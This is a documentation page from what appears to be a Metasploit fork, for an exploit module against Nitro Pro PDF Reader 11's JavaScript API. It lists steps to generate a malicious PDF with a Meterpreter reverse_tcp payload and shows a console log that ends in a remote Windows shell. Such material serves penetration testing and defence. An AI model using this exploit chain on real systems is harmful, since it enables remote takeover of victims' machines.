adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1116635477d8d168131048e52d055eeac7b0630a
metasploit-gs/documentation/modules/exploit/windows/fileformat/nitro_reader_jsapi.rb
T
h00die e7da6e77a5 remove and check for instruction text
2020-03-24 09:15:04 -04:00

60 lines
2.0 KiB
Ruby
Raw Blame History

## Vulnerable Application
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/fileformat/nitro_reader_jsapi```
4. Do: ```set payload windows/meterpreter/reverse_tcp```
5. Do: ```set LHOST [IP]```
6. Do: ```run```
7. You should get a shell.
## Options
### FILENAME
The file name to save the exploit pdf to. Default is `msf.pdf`
## Scenarios
### Nitro Pro PDF Reader 11.0.3.173 on Windows XP
```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\researcher\Desktop>
```
Reference in New Issue View Git Blame Copy Permalink